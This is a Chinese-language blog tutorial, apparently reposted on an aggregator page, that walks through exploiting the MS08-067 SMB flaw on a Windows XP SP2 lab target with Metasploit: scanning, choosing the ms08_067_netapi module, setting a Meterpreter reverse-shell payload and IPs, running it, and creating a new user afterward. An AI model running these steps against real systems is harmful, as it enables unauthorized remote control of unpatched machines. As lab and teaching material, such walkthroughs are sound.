必威体育Betway必威体育官网
当前位置:首页 > IT技术

Metasploit利用MS08-067漏洞

时间:2019-10-27 15:14:31来源:IT技术作者:seo实验室小编阅读:77次「手机版」
 

ms08-067

环境

攻击机器:ubuntu 18.04

被攻击机器:windows xp sp2

可能使用的工具

metasploit

nessus

nmap等

正文

首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166

在这里插入图片描述

发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是ms08-067.ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,当然在老系统中。

在这里插入图片描述

  1. 使用命令msfconsole进入metasploit控制台
  2. 使用命令search ms08-067搜索MS08-067可利用的exploit

    在这里插入图片描述

  3. 使用命令use exploit/windows/smb/ms08_067_netapi选择exploit
  4. 使用命令show options查看配置选项

    在这里插入图片描述

  5. 使用命令show payloads查看所有可以利用的payload

    在这里插入图片描述

  6. 使用set命令设置payloadset payload windows/meterpreter/rever
  7. 设置所有的必选的参数,其中攻击机的IP为192.168.1.181,被攻击机器IP为192.168.1.166

    在这里插入图片描述

    其中的target的值为10代表目标机器的操作系统为windows xp sp2 简体中文版

    在这里插入图片描述

    操作系统的确定可以使用nmap -O

    在这里插入图片描述

  8. 使用命令run运行

    在这里插入图片描述

  9. 后继操作

    后继的操作就很好玩了,比如创建一个新的用户

    在这里插入图片描述

    结束。

文章最后发布于: 2018-11-20 20:41:57

相关阅读

Spring Security 小记 - @Secured(), @PreAuthorize()

目录Spring Security 小记前言权限注解小坑Spring Security 小记 记录一下Spring Security(版本为4) 中的 @Secured(), @PreAuthor

activity-alias的使用

activity-alias是android里为了反复使用Activity而设计的。当在Activity的onCreate()方法里,运行getIntent().getComponent().getC

1-10的阶乘之和

#include<stdio.h>int main(){int n,m,s;n=1;m=1;while(n<=10){m*=n;s+=m;n++;}printf("%d",s);return 0;}

开源网站项目-静态网址导航网站

➡️ www.webstack.cc - 网址导航 项目开源地址: https://github.com/WebStackPage/WebStackPage.github.io 这是一个纯静态的网址

深度学习--识别梦幻西游2(四小人)人物图像验证码

岁月匆匆如流水,一如梦幻十几载,从开服一直断断续续玩到现在,情怀依在,一直在游戏里就属于屌丝行列(游戏舍不得花钱^_^),梦幻的外挂还是

分享到:

栏目导航

推荐阅读

热门阅读